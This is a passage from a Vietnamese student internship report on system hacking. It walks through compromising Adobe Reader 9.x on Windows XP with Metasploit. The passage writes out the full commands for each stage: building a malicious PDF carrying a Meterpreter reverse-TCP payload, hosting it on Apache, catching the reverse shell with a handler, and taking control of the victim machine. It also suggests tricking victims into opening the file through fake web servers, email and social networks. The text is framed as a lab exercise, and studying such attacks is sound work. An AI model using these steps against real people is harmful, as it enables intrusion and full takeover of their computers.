Khai thác lổ hỏng file PDF qua AdobeReader 9.x

Một phần của tài liệu Báo cáo thực tập: System hacking (Trang 29 - 34)

4. Xâm nhập và khai thác Windows XP

4.3Khai thác lổ hỏng file PDF qua AdobeReader 9.x

a) Mô tả:

Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải file …) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị “nhiễm độc”.

b) Phần mềm bị ảnh hưởng:

Adobe Reader 9.x chạy trên nền Windows XP SP3 c) Cách thực hiện tấn công:

Nguyên tắc khai thác lỗi ở đây khá đơn giản, bạn sẽ tạo ra một file mã độc có đuôi .pdf và gửi cho nạn nhân, làm thế nào để nạn nhân nhận được và mở file có chứa mã độc đó lên (các bạn có thể tạo một Webserver giả mạo, dụ nạn nhân tải file đó về hoặc có thể gửi kèm theo mail, quăng lên các mạng xã hội, các nơi tải file …) và máy nạn nhân đang sử dụng AdobeReader 9.x. máy nạn nhân sẽ bị “nhiễm độc”.

SVTH: Huỳnh Dương Khang Trang 30

Mô hình bài Lab

Máy Hacker: Hệ điều hành: Sử dụng Backtrack 5 IP: 192.168.119.132 Máy nạn nhân: Hệ điều hành: Sử dụng Windows XP IP: 192.168.119.129 Cách khai thác:

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole Từ dấu nhắc sử dụng lệnh dưới để search mã lỗi trong msf msf > search adobe_pdf

copy đường dẫn, ở đây ta sử dụng adobe_pdf_embedded_exe, enter gõ use “dán đường dẫn vào”

msf > use exploit/windows/fileformat/adobe_pdf_embedded_exe Gõ lệnh show options để thấy những option của lỗi

System Hacking Athena Center

SVTH: Huỳnh Dương Khang Trang 31

Ở đây ta thấy bắt buộc phải tạo INFILENAME Lần lượt gõ các lệnh:

msf exploit(adobe_pdf_embedded_exe) > set filename filemadoc.pdf

Copy sẵn 1 file pdf bất kỳ làm infilename, ở đây mình có sẵn 1 file infilename.pdf ngoài Desktop.

msf exploit(adobe_pdf_embedded_exe) > set infilename /root/Desktop/infilename.pdf msf exploit(adobe_pdf_embedded_exe) > set LHOST 192.168.119.132

Địa chỉ này là địa chỉ IP của máy Hacker chính là máy BackTrack.

msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD

windows/meterpreter/reverse_tcp

msf exploit(adobe_pdf_embedded_exe) > exploit

Ta sẽ thấy có một file filemadoc.pdf được tạo ra (đây chỉ là ví dụ các bạn đặt tên theo ý mình thích), ta copy file “filemadoc.pdf” đã được tạo ra ngoài Desktop cho dễ sử dụng.

msf exploit(adobe_pdf_embedded_exe) > cp /root/.msf4/local/filemadoc.pdf

SVTH: Huỳnh Dương Khang Trang 32 Vậy là việc tạo ra file chứa mã độc đã xong, giờ ta gửi file này cho nạn nhân để nạn nhân chạy file này là sẽ bị dính mã độc. Trong môi trường lab nên mình dựng luôn một Webserver để nạn nhân truy cập vào. Máy BackTrack đã hỗ trợ sẵn cho ta Webserver ta chỉ việc chạy.

Upload file “filemadoc.pdf” lên Webserver bằng cách đưa nó vào thư mục “/var/www” Start Webserver ảo bằng lệnh (mở một cửa số cmd khác).

root@bt:~# service apache2 start

* Starting web server apache2 [ OK ]

Giờ ta qua máy nạn nhân truy cập vào Webserver ta đã dựng và tải file “filemadoc.doc” về.

System Hacking Athena Center

SVTH: Huỳnh Dương Khang Trang 33

Tạo ra một trình lắng nghe (adsbygoogle = window.adsbygoogle || []).push({});

msf exploit(adobe_pdf_embedded_exe) > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp msf exploit(handler) >set LHOST 192.168.119.132

msf exploit(handler) > exploit

Kiểm tra máy hacker ta thấy mã độc đã được tiêm vào máy nạn nhân Mã độc đã được tiêm từ máy 192.168.119.132:4444 tới máy

192.168.119.129:1210

SVTH: Huỳnh Dương Khang Trang 34

Gõ getuid để thấy thông tin username, getinfo để biết thông tin máy, ls C:\ để xem ổ đĩa, mkdir để tạo thư mục, … nói chung ta đã hoàn toàn kiểm xoát được máy nạn nhân

.

Một phần của tài liệu Báo cáo thực tập: System hacking (Trang 29 - 34)